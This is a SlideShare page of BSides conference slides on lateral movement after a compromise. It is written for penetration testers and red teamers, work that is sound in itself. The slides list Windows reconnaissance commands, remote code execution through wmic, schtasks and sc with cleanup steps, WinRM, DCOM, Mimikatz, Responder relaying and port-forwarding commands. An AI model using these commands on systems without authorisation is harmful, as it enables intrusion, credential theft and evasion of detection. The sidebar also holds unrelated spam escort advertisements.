SlideShare a Scribd company logo

Bsides final

Download as PPTX, PDF
C
Collyn Hartley

Matt Batten (sleepZ3R0) spoke at BSIDES AUGUSTA and BSIDES RDU these are our slides. Hope you can learn and benefit from them. If you have any questions feel free to send us messages on twitter we will always respond.

Technology
1 of 46
BSIDES FIRST TIME PRESENTERS Movement After Initial Compromise MATT BATTEN (@SleepZ3R0) COLLYN HARTLEY (@HA12TL3Y)
Matt Batten (SleepZ3R0) ▶ Twitter: @SleepZ3R0 ▶ https://github.com/SleepZ3R0 ▶ Where I work: ▶ Husband / Red Teamer / Penetration Tester / Developer / Marine Corps Veteran / Cat Dad
Collyn Hartley (HA12TL3Y) ▶ Twitter: @HA12TL3Y ▶ Military Red Teamer ▶ Brother / Red Teamer / Penetration Tester / Active Duty Military / Dog Dad
What will be covered ▶ Initial Recon once on a compromised system ▶ Lateral movement ▶ How to do port forwarding in more than one way with real examples ▶ How to utilize tradecraft to not get caught while moving ▶ What tools are being used today
Setting the Stage ▶ You have already compromised a system utilizing your preferred method
First things first… Once on a compromised system here are some questions to ask yourself. ▶ Who am I on this network? ▶ Where am I in this network? ▶ Can I move to another system with my current permissions? ▶ Can I get system on my current compromised system?
Understand your surroundings Part 1 ▶ net user ▶ net user /domain ▶ net group “Domain Admins” /domain ▶ net group /domain ▶ net use ▶ net start ▶ net localgroup /domain ▶ netstat -ano ▶ netsh firewall show state ▶ netsh firewall show config
Understand your surroundings Part 2 ▶ ipconfig /all ▶ route print ▶ tasklist /SVC ▶ arp –a ▶ driverquery ▶ hostname ▶ wmic qfe ▶ set ▶ systeminfo | findstr /B /C:”OS Name” /C:”OS Version” ▶ schtasks /query /fo LIST /v ▶ whoami ▶ whoami /all ▶ echo %logonserver% ▶ echo %username%
Net user Net user /domain net user net user /domain net group “domain admins” /domain net group /domain
Net startnet start net localgroup /domain
netstat -ano netsh firewall show state
netsh firewall show config route print
Tasklist /SVCtasklist /SVC driverquery
Arp -a Set arp -a set schtasks /query /fo list /v
Whoami Echo %logonserver% Echo %username% whoami echo %logonserver% echo %username%
▶ Powerup has a built in module for DLL hijacking that can be used to accomplish priv esc on target. DLL Hijacking
Remote Code Execution #1 ▶ WMIC Shell wmic /node:<target> process call create “C:windowstempmatt.exe”
Remote Code Execution #2 ▶ SCHTASKS Shell schtasks /create /tn <matt.exe> /tr c:windowstempmatt.exe /sc once /st 00:00 /s <target> /RU system Shell schtasks /run /tn <matt> /s <target> Then delete the tasks after it executes Schell schtasks /F /delete /tn <matt> /s <target>
Remote Code Execution #3 ▶ SERVICE (SC) Shell sc <target> create <matt> binpath=“c:windowstemp<matt.exe>” Shell sc <target> start <matt> Make sure to delete the service after it runs Shell sc <target> delete <matt>
PSEXEC
WinRM ▶ On port 5985 and 5986 (5986 is for encrypted) ▶ If 5985 is open then you can enumerate using WinRm ▶ Have to have local admin permissions to run: Invoke-Command -ComputerName TARGET -ScriptBlock {commands} Windows Server 2008 and newer there is Windows Remote Shell(WRS) winrs -r:http://WIN-2NE38K15TGH/wsman “cmd”
Remote Registry
DCOM ▶ Matt Nelson documented this method of using DCOM over RPC to instantiate a "MMC20.Application" COM object and then calling the ExecuteShellCommand method. ▶ Result: ▶ Immediate command execution under the administrative account used. ▶ Implementation Details: ▶ Connecting to remote procedure call portmapper interface (RpcSs service in svchost.exe directly listening on TCP port 135) then to an RPC server on an ephemeral port (such as 49154 or 49159 etc.).
MIMIKATZ
Responder LLMNR and NBT-NS Spoofing Attack is an easy way, even today, to harvest credentials and laterally move based off of normal network traffic.
RunFinger.py
Multi-Relay ▶ A powerful pentest utility included in Responder's tools folder giving you the ability to perform targeted NTLMv1 and NTLMv2 relay on a selected target. ▶ Currently MultiRelay relays HTTP, WebDav, Proxy, and SMB authentications to an SMB server. ▶ This tool can be customized to accept a range of users to relay to a target. The concept behind this is to only target domain Administrators, local Administrators, or privileged accounts.
PORT FORWARDING ▶ SSH port forwarding ssh -L 8080:internalTarget:80 user@compromisedMachine ▶ Metasploit port forwarding portfwd add –l 3389 –p 3389 –r 172.16.194.191 ▶ Plink port forwarding plink.exe {host-B} -P 22 -C -L 127.0.0.1:444:{host-C}:3389 -l username -pw password ▶ Proxychains port forwarding: SOCKS with CobaltStrike
Port Forwarding with SOCKS
Port Forwarding through Meterpreter
Hosting Payload
Port Forwarding through Meterpreter
BloodHound
References ▶ http://www.itprotoday.com/management-mobility/psexec ▶ http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html ▶ https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning ▶ https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python ▶ https://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/ ▶ https://github.com/gentilkiwi/mimikatz ▶ https://specterops.io/ ▶ https://github.com/rsmudge ▶ https://www.reddit.com/r/AskNetsec/comments/87cfh0/responderpy_mitigation/ (n00py) ▶ https://github.com/BloodHoundAD/BloodHound/ ▶ https://blog.rapid7.com/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit/ ▶ https://www.cybereason.com/blog/dcom-lateral-movement-techniques ▶ https://blog.varonis.com/dcom-distributed-component-object-model
People who have influenced us and this talk (even if they don’t know it!) @harmj0y @malwareunicorn @_wald0 @ReL1K @CptJesus @mstair @MadHatt3r @MalwareJake @shortxstack @enigma0x3 @r3dQu1nn @danielhbohannon @merrillmatt011 @georgiaweidman @PyroTek3 @mubix @byt3bl33d3r @H011YxW00D @armitagehacker @Lee_Holmes @gentilkiwi @SpectorOps
If you enjoyed this talk and would like to know more ▶ Check out the references on slide earlier. ▶ Slides will be published publicly ▶ Because we do not know where we are posting the slides yet if you follow on Twitter we will let you know shortly ▶ If you have any questions or just interested in talking feel free to message either of us on Twitter, and we will respond in a timely manner. ▶ @SleepZ3R0 ▶ https://github.com/SleepZ3R0 ▶ @HA12TL3Y Questions?

Recommended

Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOpsPichaya Morimoto
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box AttackPrathan Phongthiproek
 
Linux networking
Linux networkingLinux networking
Linux networkingArie Bregman
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 MarsRémi Dubois
 
Realtime Communication Techniques with PHP
Realtime Communication Techniques with PHPRealtime Communication Techniques with PHP
Realtime Communication Techniques with PHPWaterSpout
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
 
Network configuration
Network configurationNetwork configuration
Network configurationengshemachi
 

Recommended

Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOpsPichaya Morimoto
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box AttackPrathan Phongthiproek
 
Linux networking
Linux networkingLinux networking
Linux networkingArie Bregman
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 MarsRémi Dubois
 
Realtime Communication Techniques with PHP
Realtime Communication Techniques with PHPRealtime Communication Techniques with PHP
Realtime Communication Techniques with PHPWaterSpout
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
 
Network configuration
Network configurationNetwork configuration
Network configurationengshemachi
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at youRob Fuller
 
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...Moabi.com
 
Technical Overview of QUIC
Technical Overview of QUICTechnical Overview of QUIC
Technical Overview of QUICshigeki_ohtsu
 
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab using wireshark to observe the tcp 3-way handshakegabriel morillo
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commandsSayed Ahmed
 
Ethernet Shield
Ethernet ShieldEthernet Shield
Ethernet ShieldTinker
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawRedspin, Inc.
 
Containers for sysadmins
Containers for sysadminsContainers for sysadmins
Containers for sysadminsCarlos de Alfonso Laguna
 
Fail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osFail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osSamina Fu (Shan Jung Fu)
 
Hacking and Computer Forensics
Hacking and Computer ForensicsHacking and Computer Forensics
Hacking and Computer ForensicsKristian Arjianto
 
Networking in linux
Networking in linuxNetworking in linux
Networking in linuxVarnnit Jain
 
Dc10 beale-attackdefendunix
Dc10 beale-attackdefendunixDc10 beale-attackdefendunix
Dc10 beale-attackdefendunixPriya Kelkar
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflowAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationRobert Rowley
 
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaNessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaHanaysha
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Abhichai L.
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
 

More Related Content

What's hot

Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at youRob Fuller
 
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...Moabi.com
 
Technical Overview of QUIC
Technical Overview of QUICTechnical Overview of QUIC
Technical Overview of QUICshigeki_ohtsu
 
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab using wireshark to observe the tcp 3-way handshakegabriel morillo
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commandsSayed Ahmed
 
Ethernet Shield
Ethernet ShieldEthernet Shield
Ethernet ShieldTinker
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawRedspin, Inc.
 
Fail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osFail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osSamina Fu (Shan Jung Fu)
 
Hacking and Computer Forensics
Hacking and Computer ForensicsHacking and Computer Forensics
Hacking and Computer ForensicsKristian Arjianto
 
Networking in linux
Networking in linuxNetworking in linux
Networking in linuxVarnnit Jain
 
Dc10 beale-attackdefendunix
Dc10 beale-attackdefendunixDc10 beale-attackdefendunix
Dc10 beale-attackdefendunixPriya Kelkar
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationRobert Rowley
 
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaNessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaHanaysha
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Abhichai L.
 

What's hot (19)

Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
 
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
 
Technical Overview of QUIC
Technical Overview of QUICTechnical Overview of QUIC
Technical Overview of QUIC
 
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
7.2.1.8 lab using wireshark to observe the tcp 3-way handshake
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commands
 
Ethernet Shield
Ethernet ShieldEthernet Shield
Ethernet Shield
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
 
Containers for sysadmins
Containers for sysadminsContainers for sysadmins
Containers for sysadmins
 
Fail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux osFail2ban - the system security for green hand -on linux os
Fail2ban - the system security for green hand -on linux os
 
Hacking and Computer Forensics
Hacking and Computer ForensicsHacking and Computer Forensics
Hacking and Computer Forensics
 
Networking in linux
Networking in linuxNetworking in linux
Networking in linux
 
Dc10 beale-attackdefendunix
Dc10 beale-attackdefendunixDc10 beale-attackdefendunix
Dc10 beale-attackdefendunix
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumeration
 
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaNessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178
 

Similar to Bsides final

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick StackGianluca Arbezzano
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStormShu Sugimoto
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdffaker1842002
 
Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Keisuke Takahashi
 
Profiling your Java Application
Profiling your Java ApplicationProfiling your Java Application
Profiling your Java ApplicationVictor Rentea
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
What's New and Newer in Apache httpd-24
What's New and Newer in Apache httpd-24What's New and Newer in Apache httpd-24
What's New and Newer in Apache httpd-24Jim Jagielski
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraftenigma0x3
 

Similar to Bsides final (20)

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT Devices
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-Framework
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick Stack
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStorm
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
 
Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5Trying and evaluating the new features of GlusterFS 3.5
Trying and evaluating the new features of GlusterFS 3.5
 
Profiling your Java Application
Profiling your Java ApplicationProfiling your Java Application
Profiling your Java Application
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
What's New and Newer in Apache httpd-24
What's New and Newer in Apache httpd-24What's New and Newer in Apache httpd-24
What's New and Newer in Apache httpd-24
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraft
 

Recently uploaded

Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetEnjoy Anytime
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
